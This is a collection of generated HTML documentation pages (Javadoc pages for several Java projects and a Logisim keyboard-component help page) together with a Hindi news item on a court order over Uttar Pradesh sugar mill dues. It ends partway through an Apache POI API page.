<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../index.html?net/bican/wordpress//class-useMediaObject.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="MediaObject.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_bottom"></A> <!-- ======== END OF BOTTOM NAVBAR ======= --> <HR> Copyright &#169; 2011. All Rights Reserved. </BODY> </HTML>
doc/com/eduardo/mainapp/package-use.html
eduardobape/trip-sorter
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="es"> <head> <!-- Generated by javadoc (1.8.0_112) on Thu Dec 29 19:59:20 CET 2016 --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Uses of Package com.eduardo.mainapp</title> <meta name="date" content="2016-12-29"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Package com.eduardo.mainapp"; } } catch(err) { } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../index-files/index-1.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../index.html?com/eduardo/mainapp/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Uses of Package com.eduardo.mainapp" class="title">Uses of Package<br>com.eduardo.mainapp</h1> </div> <div class="contentContainer">No usage of com.eduardo.mainapp</div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li>Class</li> <li class="navBarCell1Rev">Use</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../index-files/index-1.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="../../../index.html?com/eduardo/mainapp/package-use.html" target="_top">Frames</a></li> <li><a href="package-use.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
Logisim-Fork/doc/de/html/libs/io/keyboard.html
LogisimIt/Logisim
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title>Tastatur</title> </head> <body bgcolor="FFFFFF"> <h1><img align="center" src="../../../../../resources/logisim/icons/keyboard.gif" width="32" height="32"> <em>Tastatur</em></h1> <p><table> <tr><td><strong>Bibliothek:</strong></td> <td><a href="index.html">Input/Output</a></td></tr> <tr><td><strong>Eingeführt:</strong></td> <td>2.2.0</td></tr> <tr><td valign="top"><strong>Aussehen:</strong></td> <td valign="top"><img src="../../../../en/img-libs/keyboard.png" width="148" height="28"></td></tr> </table></p> <h2>Verhalten</h2> <p>This component allows the circuit to read keys typed from the keyboard - as long as the keys are representable in the 7-bit ASCII code / 16-bit UTF-16 code. After clicking the component using the poke tool, the user can type characters, which accumulate in a buffer. At all times, the ASCII / UTF-16 value for the leftmost character in the buffer is sent out the rightmost output. When the clock input is triggered, the leftmost character disappears from the buffer and the new leftmost character is sent on the rightmost output.</p> <p>The supported characters for the buffer include all the printable ASCII / UTF-16 characters, as well as space, newline, backspace, and control-L. In addition, the left-arrow and right-arrow keys move the cursor within the buffer, and the delete key deletes the character to the right of the cursor (if any).</p> <p>The component is asynchronous in the sense that when the buffer is empty and the user types a character, that character is sent immediately as an output, without any wait for a clock pulse.</p> <h2>Pins</h2> <dl> <dt>West edge, marked by a triangle (input, bit width 1)</dt> <dd>Clock - when triggered while the read-enable pin isn't 0, the leftmost character from the buffer is deleted, and the outputs are updated to reflect the buffer's new status.</dd> <dt>South edge, leftmost pin (input, bit width 1)</dt> <dd>Read Enable - when 1 (or floating or error), a clock edge will consume the leftmost character from the buffer. The clock input is ignored when Read Enable is 0.</dd> <dt>South edge, second pin from left (input, bit width 1)</dt> <dd>Clear - when 1, the buffer is emptied and does not accept further characters.</dd> <dt>South edge, second pin from right (output, bit width 1)</dt> <dd>Available - this is 1 when the buffer contains at least one character and 0 when the buffer is empty.</dd> <dt>South edge, rightmost pin (output, bit width 7)</dt> <dd>Data - the 7-bit ASCII code / 16-bit UTF-16 code for the leftmost character in the buffer, or 0 if the buffer is empty.</dd> </dl> <h2>Attribute</h2> <dl> <dt>Data Bits</dt> <dd>Select if this component has to use 7-bit ASCII or 16-bit UTF-16 values</dd> <dt>Buffer Length</dt> <dd>The number of characters that the buffer can hold at once.</dd> <dt>Trigger</dt> <dd>If the value is <q>Rising Edge,</q> then when the clock input changes from 0 to 1, the leftmost character is consumed (when enabled by the Read Enable input). If it is <q>Falling Edge,</q>, then this happens when the clock input changes from 1 to 0.</dd> </dl> <h2>Verhalten des Schaltwerkzeugs</h2> <p>Pressing the mouse button into the component gives keyboard focus to the component, and a vertical-bar cursor will be displayed.</p> <p>Each character typed will then be inserted into the buffer, as long as the buffer hasn't reached its capacity and the character is one of those that the component supports: the printable characters within the 7-bit ASCII code / 16-bit UTF-16 code, as well as space, backspace, newline, and control-L. Additionally, the user may type the left-arrow and right-arrow keys to change the location of the cursor within the buffer, and the user may type the delete key to delete the buffer character (if any) just to the right of the cursor.</p> <h2>Verhalten des Textwerkzeugs</h2> <p>Keines.</p> <p><a href="../index.html">Zurück zur <em>Bibliotheksreferenz</em></a></p> </body> </html>
_source/news/22498-lucknow.html
InstantKhabar/_source
--- title: "हाई कोर्ट ने यूपी के चीनी मिल मालिकों को दी कड़वी डोज़" layout: item category: lucknow date: 2015-05-28T11:02:50.000Z image: 0e199bc978fc91396cfca3ef95ea7ac9.jpg --- <h3 style="text-align: center;">30 जून तक बकाए का 50 फीसदी चुकाने का दिया आदेश </h3> <p style="text-align: justify;">लखनऊ। यूपी के इलाहाबाद हाईकोर्ट का फैसला आया है जिसमें उत्तर प्रदेश की चीनी मिलों को निर्देश दिया गया है कि वे 30 जून तक अपने बकाए का 50 फीसदी भाग चुकाएं। इस निर्देश में ये भी कहा गया है कि चीनी मिलों को 15 जुलाई तक अपने बकाए का 75 फीसदी चुकाना होगा।</p> <p style="text-align: justify;">आपको बता दे कि उत्तर प्रदेश की चीनी मिलों पर किसानों का 9800 करोड़ रुपये बकाया है। जानकारों का कहना है कि अदालत का ये फैसला निश्चित तौर पर काफी निगेटिव है। इस फैसले से यूपी की चीनी मिलों के कैश फ्लो पर खराब असर पड़ेगा।</p> <p style="text-align: justify;">इस खबर पर इंडियन शुगर मिल एसोसिएशन के डायरेक्टर जनरल अविनाश वर्मा का कहना है कि चीनी की कीमतें अभी भी 8-10 रुपये प्रति किलो कम हैं। हाईकोर्ट के इस आदेश का पालन करना अधिकांश चीनी मिलों के लिए बहुत मुश्किल होगा।</p> <p style="text-align: justify;">अविनाश वर्मा का मानना है कि इस आदेश का पालन करने के लिए चीनी मिलों के पास कैश फ्लो होना चाहिए। इन मिलों के पास जो चीनी है उसको बेच कर ही इस आदेश का पालन किया जा सकेगा। जिसके लिए करीब 20 लाख टन चीनी बेचना होगा जो कि बहुत मुश्किल है। इस आदेश के पालन के लिए चीनी मिलों को थोड़ा और समय मिलना चाहिए तभी इसका पालन संभव है। उन्होंने कहा कि इस आदेश को लेकर केंद्र और राज्य सरकार के साथ बात की जाएगी</p>
docs/com/konukoii/smokesignals/RingWakeLock.html
UCSB-CS56-Projects/cs56-android-smoke-signals
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (1.8.0_152-release) on Wed Mar 14 02:56:06 PDT 2018 --> <title>RingWakeLock</title> <meta name="date" content="2018-03-14"> <link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style"> <script type="text/javascript" src="../../../script.js"></script> </head> <body> <script type="text/javascript"><!-- try { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="RingWakeLock"; } } catch(err) { } //--> var methods = {"i0":9,"i1":9}; var tabs = {65535:["t0","All Methods"],1:["t1","Static Methods"],8:["t4","Concrete Methods"]}; var altColor = "altColor"; var rowColor = "rowColor"; var tableTab = "tableTab"; var activeTableTab = "activeTableTab"; </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar.top"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.top.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-files/index-1.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../com/konukoii/smokesignals/RingActivity.html" title="class in com.konukoii.smokesignals"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../com/konukoii/smokesignals/Settings.html" title="class in com.konukoii.smokesignals"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?com/konukoii/smokesignals/RingWakeLock.html" target="_top">Frames</a></li> <li><a href="RingWakeLock.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">com.konukoii.smokesignals</div> <h2 title="Class RingWakeLock" class="title">Class RingWakeLock</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>com.konukoii.smokesignals.RingWakeLock</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public class <span class="typeNameLabel">RingWakeLock</span> extends java.lang.Object</pre> <div class="block">Created by ankushrayabhari on 11/9/17.</div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.summary"> <!-- --> </a> <h3>Constructor Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colOne" scope="col">Constructor and Description</th> </tr> <tr class="altColor"> <td class="colOne"><code><span class="memberNameLink"><a href="../../../com/konukoii/smokesignals/RingWakeLock.html#RingWakeLock--">RingWakeLock</a></span>()</code>&nbsp;</td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method.summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd">&nbsp;</span></span><span id="t1" class="tableTab"><span><a href="javascript:show(1);">Static Methods</a></span><span class="tabEnd">&nbsp;</span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd">&nbsp;</span></span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr id="i0" class="altColor"> <td class="colFirst"><code>static void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../com/konukoii/smokesignals/RingWakeLock.html#acquireLock-android.content.Context-">acquireLock</a></span>(android.content.Context&nbsp;context)</code>&nbsp;</td> </tr> <tr id="i1" class="rowColor"> <td class="colFirst"><code>static void</code></td> <td class="colLast"><code><span class="memberNameLink"><a href="../../../com/konukoii/smokesignals/RingWakeLock.html#releaseLock-android.content.Context-">releaseLock</a></span>(android.content.Context&nbsp;context)</code>&nbsp;</td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods.inherited.from.class.java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ========= CONSTRUCTOR DETAIL ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor.detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="RingWakeLock--"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>RingWakeLock</h4> <pre>public&nbsp;RingWakeLock()</pre> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="acquireLock-android.content.Context-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>acquireLock</h4> <pre>public static&nbsp;void&nbsp;acquireLock(android.content.Context&nbsp;context)</pre> </li> </ul> <a name="releaseLock-android.content.Context-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>releaseLock</h4> <pre>public static&nbsp;void&nbsp;releaseLock(android.content.Context&nbsp;context)</pre> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-files/index-1.html">Index</a></li> <li><a href="../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../com/konukoii/smokesignals/RingActivity.html" title="class in com.konukoii.smokesignals"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../com/konukoii/smokesignals/Settings.html" title="class in com.konukoii.smokesignals"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?com/konukoii/smokesignals/RingWakeLock.html" target="_top">Frames</a></li> <li><a href="RingWakeLock.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.summary">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li>Field&nbsp;|&nbsp;</li> <li><a href="#constructor.detail">Constr</a>&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
CSC 445 WebCentric Programming/Final Project/poi-3.14/docs/apidocs/org/apache/poi/sl/usermodel/class-use/ConnectorShape.html
jmemmons/university-assignments
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <TITLE> Uses of Interface org.apache.poi.sl.usermodel.ConnectorShape (POI API Documentation) </TITLE> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Interface org.apache.poi.sl.usermodel.ConnectorShape (POI API Documentation)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../../index.html?org/apache/poi/sl/usermodel/\class-useConnectorShape.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="ConnectorShape.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Interface<br>org.apache.poi.sl.usermodel.ConnectorShape</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.poi.hslf.usermodel"><B>org.apache.poi.hslf.usermodel</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.poi.sl.draw"><B>org.apache.poi.sl.draw</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.poi.sl.usermodel"><B>org.apache.poi.sl.usermodel</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.apache.poi.xslf.usermodel"><B>org.apache.poi.xslf.usermodel</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.poi.hslf.usermodel"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A> in <A HREF="../../../../../../org/apache/poi/hslf/usermodel/package-summary.html">org.apache.poi.hslf.usermodel</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Classes in <A HREF="../../../../../../org/apache/poi/hslf/usermodel/package-summary.html">org.apache.poi.hslf.usermodel</A> that implement <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;class</CODE></FONT></TD> <TD><CODE><B><A HREF="../../../../../../org/apache/poi/hslf/usermodel/HSLFConnectorShape.html" title="class in org.apache.poi.hslf.usermodel">HSLFConnectorShape</A></B></CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Specifies a connection shape.</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.poi.sl.draw"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A> in <A HREF="../../../../../../org/apache/poi/sl/draw/package-summary.html">org.apache.poi.sl.draw</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../../org/apache/poi/sl/draw/package-summary.html">org.apache.poi.sl.draw</A> with parameters of type <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../../../org/apache/poi/sl/draw/DrawConnectorShape.html" title="class in org.apache.poi.sl.draw">DrawConnectorShape</A></CODE></FONT></TD> <TD><CODE><B>DrawFactory.</B><B><A HREF="../../../../../../org/apache/poi/sl/draw/DrawFactory.html#getDrawable(org.apache.poi.sl.usermodel.ConnectorShape)">getDrawable</A></B>(<A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A>&lt;?,?&gt;&nbsp;shape)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Constructors in <A HREF="../../../../../../org/apache/poi/sl/draw/package-summary.html">org.apache.poi.sl.draw</A> with parameters of type <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><CODE><B><A HREF="../../../../../../org/apache/poi/sl/draw/DrawConnectorShape.html#DrawConnectorShape(org.apache.poi.sl.usermodel.ConnectorShape)">DrawConnectorShape</A></B>(<A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A>&lt;?,?&gt;&nbsp;shape)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.apache.poi.sl.usermodel"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A> in <A HREF="../../../../../../org/apache/poi/sl/usermodel/package-summary.html">org.apache.poi.sl.usermodel</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../../org/apache/poi/sl/usermodel/package-summary.html">org.apache.poi.sl.usermodel</A> that return <A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>&nbsp;<A HREF="../../../../../../org/apache/poi/sl/usermodel/ConnectorShape.html" title="interface in org.apache.poi.sl.usermodel">ConnectorShape</A>&lt;<A HREF="../../../../../../org/apache/poi/sl/usermodel/ShapeContainer.html" title="type parameter in 